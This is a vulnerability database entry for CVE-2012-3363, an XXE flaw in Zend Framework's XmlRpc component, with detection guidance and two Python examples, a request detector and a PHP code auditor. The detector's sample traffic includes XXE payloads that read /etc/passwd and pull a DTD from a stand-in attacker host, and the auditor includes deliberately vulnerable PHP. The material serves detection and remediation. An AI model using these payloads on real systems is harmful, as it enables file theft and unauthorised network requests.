cbcvebase.
CVE-2012-3363
published 2013-02-13


Priority P2 78 · critical 9.1 · CVSS 3.1 · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Flags: EXPLOIT
EPSS: 50.25% (98.8th percentile)
Zend_XmlRpc in Zend Framework 1.x before 1.11.12 and 1.12.x before 1.12.0 does not properly handle SimpleXMLElement classes, which allows remote attackers to read arbitrary files or create TCP connections via an external entity reference in a DOCTYPE element in an XML-RPC request, aka an XML external entity (XXE) injection attack.

Affected

63 ranges · showing 25 (the version-range and fixed-in columns were not captured in this extract; the description above gives the fix versions as 1.11.12 and 1.12.0)

Vendor         Product          Version range   Fixed in       Ranges shown
debian         debian_linux     (not captured)  (not captured)  1
fedoraproject  fedora           (not captured)  (not captured)  2
zend           zend_framework   (not captured)  (not captured)  22

Detection & IOCs (extracted from sources)

path: Zend\XmlRpc\Request.php
path: Zend\XmlRpc\Response.php
path: Zend\XmlRpc\Server.php
url: http://framework.zend.com/security/advisory/ZF2012-01
  • Detect HTTP POST requests to XML-RPC endpoints whose body contains a DOCTYPE element declaring an external entity (XXE payload) that points at a local file or a network URI.
  • Look for XML-RPC POST bodies that contain both a DOCTYPE declaration and an entity reference (e.g., &xxe;), the canonical XXE pattern used against Zend_XmlRpc. The stronger signal is the external entity declaration itself (SYSTEM or PUBLIC): a reference alone also matches harmless internal entities, and blind variants fire through a parameter entity (%name;) inside the DTD with no reference in the method body at all.
  • Flag PHP code that instantiates SimpleXMLElement (or calls simplexml_load_string) without a preceding libxml_disable_entity_loader(true) as the vulnerable pattern for this CVE; that call is the guard the ZF2012-01 fix introduces. On PHP 8 the function is deprecated because libxml 2.9+ disables external entity loading by default, so there the equivalent hardening is an explicit DOCTYPE rejection before parsing.
  • Monitor XML-RPC requests to Moodle web-service endpoints for DOCTYPE/external-entity payloads, as Moodle's bundled Zend library is also affected.
  • The vulnerability affects both the server and the client code paths (Zend_XmlRpc_Client parses responses through Response.php); detection and patching must cover both Request.php and Response.php, not just the server-side handler.
  • Older Zend Framework branches (before 1.11.x and 1.12.x) are also affected but receive no official fix; environments on those branches need manual remediation or an upgrade.
  • Any third-party software that bundles or depends on the Zend XmlRpc package inherits this vulnerability and must be patched independently (e.g., Moodle).
  • CVE-2012-3363 is distinct from CVE-2012-6531, which covers Zend_Dom, Zend_Feed and Zend_Soap; both share the same XXE root cause but affect different components.
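The request-level heuristics in the first, second and fourth bullets above, worked through as an added example (my code, not Zend Framework's, Moodle's or this page's): the watched endpoint paths and every sample request are constructed assumptions, not captured traffic. It goes a little beyond the bullets in that it separates an external entity declaration (SYSTEM/PUBLIC) from a bare DOCTYPE, classifies the entity URI by the effect named in the CVE text (file read, TCP connection, PHP stream wrapper), and catches the parameter-entity form that never places an &x; reference in the method body.

```python
"""Flag XML-RPC requests carrying the XXE payload described for CVE-2012-3363.

Added example for this page; not code from Zend Framework, Moodle or cbcvebase.
Endpoint paths and sample requests are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Endpoints to inspect (assumed): a typical Zend_XmlRpc_Server mount point and
# Moodle's XML-RPC web-service entry point.
XMLRPC_PATHS = ("/xmlrpc", "/xmlrpc.php", "/webservice/xmlrpc/server.php")

# XML keywords are case-sensitive and libxml only honours the upper-case forms,
# so the detector matches them case-sensitively too.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b")
# External entity declarations: SYSTEM "uri" or PUBLIC "id" "uri". A leading
# "%" marks a parameter entity, which is expanded inside the DTD itself.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s%>]+)\s+"
    r"(?:SYSTEM\s+(?P<sys>\"[^\"]*\"|'[^']*')"
    r"|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+(?P<pub>\"[^\"]*\"|'[^']*'))"
)
NET_SCHEMES = {"http", "https", "ftp"}
WRAPPER_SCHEMES = {"php", "phar", "expect", "data", "glob", "compress.zlib"}


@dataclass
class Entity:
    name: str
    uri: str
    effect: str        # file-read | tcp-connect | php-wrapper | other
    referenced: bool   # &name; (or %name;) appears after the declaration


@dataclass
class Finding:
    kind: str                                   # "xxe" or "doctype"
    entities: List[Entity] = field(default_factory=list)


def classify_uri(uri: str) -> str:
    """Map an entity system identifier to the effect named in the CVE text."""
    scheme = urlsplit(uri).scheme.lower()
    if scheme in ("", "file") or len(scheme) == 1:   # bare path or drive letter
        return "file-read"
    if scheme in NET_SCHEMES:
        return "tcp-connect"
    if scheme in WRAPPER_SCHEMES:
        return "php-wrapper"
    return "other"


def inspect_request(method: str, path: str, body: str,
                    watched: Tuple[str, ...] = XMLRPC_PATHS) -> Optional[Finding]:
    """Finding for a POST to a watched XML-RPC path whose decoded body carries
    a DOCTYPE; None for anything else."""
    if method.upper() != "POST" or path.split("?", 1)[0] not in watched:
        return None
    if not DOCTYPE_RE.search(body):
        return None
    entities = []
    for d in ENTITY_RE.finditer(body):
        uri = (d.group("sys") or d.group("pub"))[1:-1]          # strip quotes
        sigil = "%" if d.group("param") else "&"
        used = (sigil + d.group("name") + ";") in body[d.end():]
        entities.append(Entity(d.group("name"), uri, classify_uri(uri), used))
    return Finding("xxe" if entities else "doctype", entities)


# Constructed sample traffic (not captured from any real system).
SAMPLES = {
    "benign": ("POST", "/xmlrpc",
        '<?xml version="1.0"?><methodCall><methodName>system.listMethods'
        '</methodName><params/></methodCall>'),
    "file-read": ("POST", "/xmlrpc",
        '<?xml version="1.0"?><!DOCTYPE m [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        '<methodCall><methodName>demo.echo</methodName><params><param>'
        '<value><string>&xxe;</string></value></param></params></methodCall>'),
    "tcp-connect": ("POST", "/webservice/xmlrpc/server.php",
        '<?xml version="1.0"?><!DOCTYPE m [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/">]>'
        '<methodCall><methodName>demo.echo</methodName><params><param>'
        '<value>&xxe;</value></param></params></methodCall>'),
    "param-entity": ("POST", "/xmlrpc",          # blind variant: no &x; in the body
        '<?xml version="1.0"?><!DOCTYPE m [<!ENTITY % dtd SYSTEM '
        '"http://attacker.example/evil.dtd"> %dtd;]>'
        '<methodCall><methodName>demo.echo</methodName><params/></methodCall>'),
    "internal-only": ("POST", "/xmlrpc",
        '<?xml version="1.0"?><!DOCTYPE m [<!ENTITY greet "hello">]>'
        '<methodCall><methodName>demo.echo</methodName><params><param>'
        '<value>&greet;</value></param></params></methodCall>'),
    "not-xmlrpc": ("POST", "/upload",
        '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>'),
}


def scan(samples=SAMPLES):
    """Run every sample through the detector; returns {label: kind or None}."""
    out = {}
    for label, (method, path, body) in samples.items():
        f = inspect_request(method, path, body)
        out[label] = f.kind if f else None
    return out


if __name__ == "__main__":
    for label, (method, path, body) in SAMPLES.items():
        f = inspect_request(method, path, body)
        if f is None:
            print(f"{label:14s} ok")
            continue
        detail = ", ".join(f"{e.name} -> {e.effect}" + ("" if e.referenced else " (unreferenced)")
                           for e in f.entities) or "DOCTYPE without external entity"
        print(f"{label:14s} {f.kind.upper()}: {detail}")
```

The detector expects the already decoded request body (after any gzip or chunked transfer decoding), and treats a bare DOCTYPE as a lower-grade finding rather than noise: an XML-RPC client has no legitimate reason to ship a DTD, which is why later Zend fixes reject DOCTYPE outright.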
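The code-pattern check from the third bullet, as an added example that is not code from Zend Framework or this page: a small audit script run over PHP source. The PHP snippets are constructed to resemble the shape of Zend_XmlRpc_Request::loadXml and are not the framework's actual source. The guard it looks for is libxml_disable_entity_loader(true) placed before the parsing sink inside the same function; it also accepts an explicit DOCTYPE rejection, the equivalent hardening on PHP 8 where that function is deprecated.

```python
"""Audit PHP source for XML parsing sinks reached without an entity-loader guard.

Added example for this page, not Zend Framework code. The PHP samples are
constructed to resemble Zend_XmlRpc_Request::loadXml, not copied from ZF.
"""
import re
from typing import Iterator, List, Tuple

FUNC_RE = re.compile(r"\bfunction\s+(\w+)\s*\([^)]*\)\s*\{")
SINK_RE = re.compile(
    r"new\s+SimpleXMLElement\s*\(|\bsimplexml_load_string\s*\(|->loadXML\s*\(")
# Accepted guards: the ZF2012-01 call, or a DOCTYPE check (PHP >= 8 deprecates
# libxml_disable_entity_loader(); libxml >= 2.9 already refuses external
# entities by default, and rejecting any DOCTYPE closes the remaining DTD tricks).
GUARD_RE = re.compile(r"libxml_disable_entity_loader\s*\(\s*true\s*\)|DOCTYPE")


def function_bodies(src: str) -> Iterator[Tuple[str, str]]:
    """Yield (name, body) per function by counting braces from its opening brace.
    Deliberately naive: braces inside strings or comments are not skipped."""
    for m in FUNC_RE.finditer(src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            i += 1
        yield m.group(1), src[m.end():i - 1]


def audit(src: str) -> List[Tuple[str, str, str]]:
    """(function, sink, verdict) per sink. The guard must come BEFORE the sink in
    the same function; a restore/cleanup call placed after it does not count."""
    out = []
    for name, body in function_bodies(src):
        for s in SINK_RE.finditer(body):
            verdict = "guarded" if GUARD_RE.search(body[:s.start()]) else "UNGUARDED"
            out.append((name, re.sub(r"\s+", " ", s.group(0)), verdict))
    return out


# Constructed PHP, shaped like the pre-fix loadXml: parse straight into SimpleXML.
VULNERABLE = """
    public function loadXml($request)
    {
        try {
            $xml = @new SimpleXMLElement($request);
        } catch (Exception $e) {
            return false;
        }
        $this->_method = (string) $xml->methodName;
        return true;
    }
"""
# Constructed PHP, shaped like the ZF2012-01 fix: disable the loader, parse, restore.
FIXED = """
    public function loadXml($request)
    {
        $loader = libxml_disable_entity_loader(true);
        try {
            $xml = new SimpleXMLElement($request);
        } catch (Exception $e) {
            libxml_disable_entity_loader($loader);
            return false;
        }
        libxml_disable_entity_loader($loader);
        $this->_method = (string) $xml->methodName;
        return true;
    }
"""
# Constructed PHP with the guard in the wrong place: after the sink it is useless.
LATE_GUARD = """
    public function loadXml($request)
    {
        $xml = simplexml_load_string($request);
        libxml_disable_entity_loader(true);
        return $xml !== false;
    }
"""
# Constructed PHP using the PHP 8 style guard: refuse any DTD before parsing.
DOCTYPE_REJECT = """
    public function loadXml($request)
    {
        if (stripos($request, '<!DOCTYPE') !== false) {
            return false;
        }
        $xml = new SimpleXMLElement($request, LIBXML_NONET);
        return true;
    }
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE), ("fixed", FIXED),
                       ("late guard", LATE_GUARD), ("doctype reject", DOCTYPE_REJECT)):
        for fn, sink, verdict in audit(src):
            print(f"{label:15s} {fn}(): {sink} {verdict}")
```

Run it over lib/zend (Moodle) or library/Zend (ZF1 apps) to find bundled copies that predate the fix; a hit on a `->loadXML(` sink is worth reviewing too, since DOMDocument shares the same libxml entity handling.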

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.1     9.1    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
nvd     v2.0     6.4    MEDIUM    AV:N/AC:L/Au:N/C:P/I:P/A:N
ghsa    -        9.1    CRITICAL  -
osv     -        9.1    CRITICAL  -